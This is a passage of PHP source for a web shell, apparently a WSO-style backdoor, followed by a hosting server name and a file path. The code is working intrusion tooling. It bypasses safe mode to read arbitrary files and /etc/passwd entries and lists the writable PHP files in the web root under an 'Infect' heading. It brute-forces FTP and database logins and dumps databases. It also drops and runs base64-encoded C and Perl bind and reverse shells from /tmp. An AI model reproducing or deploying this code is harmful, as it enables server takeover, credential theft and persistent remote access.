'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo '<h1>String conversions</h1><div class=content>'; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div><br><h1>Search files:</h1><div class=content> <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> <tr><td></td><td><input type='submit' value='>>'></td></tr> </table></form>"; function hardRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $â) { if(@is_dir($â)){ if($path!=$â) hardRecursiveGlob($â); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>"; } } } } if(@$_POST['p3']) hardRecursiveGlob($_POST['c']); echo "</div><br><h1>Search for hash:</h1><div class=content> <form method='post' target='_blank' name='hf'> <input type='text' name='hash' style='width:200px;'><br> <input type='hidden' name='act' value='find'/> <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br> <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br> <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br> <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br> <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br> </form></div>"; hardFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo '<h1>Safe mode bypass</h1><div class=content>'; echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; echo '</div>'; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') hardHeader(); echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; hardFooter(); } function actionInfect() { hardHeader(); echo '<h1>Infect</h1><div class=content>'; if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT']; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file<br>"; $i++; } } } echo "<font color=red size=14>$i</font>"; }else{ echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<input type=hidden name=ne value="">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; echo '</div><br>'; hardFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table hard2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($â = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($â as $k=>$v) { if($v === null) $â[$k] = "NULL"; elseif(is_int($v)) $â[$k] = $v; else $â[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')'; $head = false; } else $sql .= "\n\t,(".implode(", ", $â).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($â = $this->fetch()) { $columns = array(); foreach($â as $k=>$v) { $â[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } hardHeader(); echo " <h1>Sql browser</h1><div class=content> <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> <input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> <td><select name='type'><option value='mysql' "; if(@$_POST['type']=='mysql')echo 'selected'; echo ">MySql</option><option value='pgsql' "; if(@$_POST['type']=='pgsql')echo 'selected'; echo ">PostgreSql</option></select></td> <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($â = $db->fetch()) { list($key, $value) = each($â); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; echo "</td> <td><input type=submit value='>>' onclick='fs(d.sf);'></td> <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> </tr> </table> <script> s_db='".@addslashes($_POST['sql_base'])."'; function fs(f) { if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; if(f.p1) f.p1.value=''; if(f.p2) f.p2.value=''; if(f.p3) f.p3.value=''; } } function st(t,l) { d.sf.p1.value = 'select'; d.sf.p2.value = t; if(l && d.sf.p3) d.sf.p3.value = l; d.sf.submit(); } function is() { for(i=0;i<d.sf.elements['tbl[]'].length;++i) d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; } </script>"; if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($â = $db->fetch($tbls_res)) { list($key, $value) = each($â); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; echo " of $pages"; if($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; if($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "<br><br>"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=1 cellpadding=2 class=main>'; $line = 1; while($â = $db->fetch()) { if(!$title) { echo '<tr>'; foreach($â as $key => $value) echo '<th>'.$key.'</th>'; reset($â); $title=true; echo '</tr><tr>'; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($â as $key => $value) { if($value == null) echo '<td><i>null</i></td>'; else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; } } echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']); echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } else { echo htmlspecialchars($db->error()); } echo '</div>'; hardFooter(); } function actionNetwork() { hardHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content> <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> <span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'> </form> <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'> <span>Back-connect to</span><br/> Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'> </form><br>"; if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $â = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $â = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; hardFooter(); } if( empty($_POST['a']) ) if(isset($â) && function_exists('action' . $â)) $_POST['a'] = $â; else $_POST['a'] = 'FilesMan'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); ?>
login-10.hoststar.at
at ttux199/wj39l.php
